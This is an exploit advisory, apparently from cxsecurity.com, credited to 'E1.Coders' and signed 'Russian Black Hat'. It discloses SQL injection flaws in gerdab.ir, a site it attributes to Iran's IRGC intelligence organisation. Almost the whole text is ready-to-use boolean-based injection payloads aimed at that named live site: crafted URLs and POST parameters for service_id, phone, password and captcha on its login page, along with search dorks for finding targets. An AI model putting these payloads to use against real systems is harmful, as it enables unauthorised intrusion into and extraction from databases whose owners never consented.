Gerdab.ir SQL Injection

2021.11.27
Credit: E1.Coders
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

This site belongs to the Revolutionary Guards Intelligence Organization of the Islamic Republic of Iran (IRGC), which has a security problem with the SQL INJECTION Vulnerability "CWE-89". We have repeatedly reported to this site that it has a security problem and has ignored our report. We want to record this security issue ######################################################################################################################### # # # Exploit Title : Site affiliated To the intelligence agency Revolutionary Guards of the Islamic Republic of Iran (IRGC) SQL INJECTION Vulnerability # # # # Author : E1.Coders # # # # Contact : E1.Coders [at] Mail [dot] RU # # # # Portal Link : www.my.gerdab.ir # # # # Security Risk : Medium # # # # Description : All target's IRanian Military websites # # # # DorK : ""inurl:reports/status?s=" "site:my.gerdab.ir/reports/status?s=" # # # ######################################################################################################################### # # # Expl0iTs: # # # # address (refer url): https://gerdab.ir/fa/archive?service_id=9&sec_id=63 # # vulnerabillity : GET SQL INJECT BOOLEAN Based string # # action url: https://gerdab.ir/fa/archive?sec_id=63&service_id=99999999 -------------------------------------------------- # # vuln type : SQLInjection # # refer address : https://gerdab.ir/fa/archive?service_id=9&sec_id=63 # # request type : COOKIE # # action url : https://gerdab.ir/fa/archive?sec_id=63&^service_id=9 # # parameter : service_id # # description : COOKIE SQL INJECTION BooleanBased String # # POC : https://gerdab.ir/fa/archive?sec_id=63&^service_id=9%27) aNd 8634682=8634682 aNd (%276199%27)=(%276199 --------------------------------------- # vuln type : SQLInjection # # refer address : https://gerdab.ir/fa/archive?service_id=9&sec_id=63 # # request type : GET # # action url : https://gerdab.ir/fa/archive?sec_id=63&service_id=9 # # parameter : service_id # # description : GET SQL INJECTION BooleanBased Integer # # POC : https://gerdab.ir/fa/archive?sec_id=63&service_id=9 RLIKE (case when 8446715=8446715 then 0x74657374696E70757476616C7565 else 0x28 end) # # ------------------------------------------------------ # # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # # request type : POST # # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=99999999 # # parameter : phone # # description : POST SQL INJECTION BooleanBased Integer # # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=99999999/**/oR/**/8871966=8871966/**/aNd/**/7193=7193 # ------------------------------------------------ # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # # request type : POST # # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=2087986 # parameter : phone # # description : POST SQL INJECTION BooleanBased Integer # # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&password=2420819&captcha=4844505&phone=2087986/**/RLIKE/**/(case/**/when/**//**/7338747=7338747/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end) # ------------------------------------------------ # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # # request type : POST # # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=99999999 # # parameter : password # # description : POST SQL INJECTION BooleanBased String # # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=99999999%27/**/oR/**/4563301=4563301/**/aNd/**/%276199%27=%276199 # ------------------------------------------------ # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # request type : POST # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=2420819 # parameter : password # description : POST SQL INJECTION BooleanBased Integer # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&captcha=4844505&password=2420819/**/RLIKE/**/(case/**/when/**//**/8423820=8423820/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end) # ------------------------------------------------ # # vuln type : SQLInjection # refer address : https://my.gerdab.ir/login # request type : POST # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=99999999 # # parameter : captcha # # description : POST SQL INJECTION BooleanBased Integer # # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=99999999/**/oR/**/6019831=6019831--%20 # ------------------------------------------------ # # vuln type : SQLInjection # # refer address : https://my.gerdab.ir/login # request type : POST # action url : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=4844505 # parameter : captcha # description : POST SQL INJECTION BooleanBased String # POC : https://my.gerdab.ir/login^_token=pgRGDYQaJUExC0ELiQjyGXfjhZ2ZmtWzTV2Tl91Z&phone=2087986&password=2420819&captcha=4844505%27/**/RLIKE/**/(case/**/when/**//**/2804470=2804470/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'7917'='7917 ------------------------------------------------ # # # 1: https://my.gerdab.ir/reports/status?s=1' # # # # 2: https://my.gerdab.ir/reports/status?s%22=%221%22 # # # ######################################################################################################################### # # # | Security Is JOCK | # # # # | Russian Black Hat | # # # ######################################################################################################################### -- E1 Coders


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top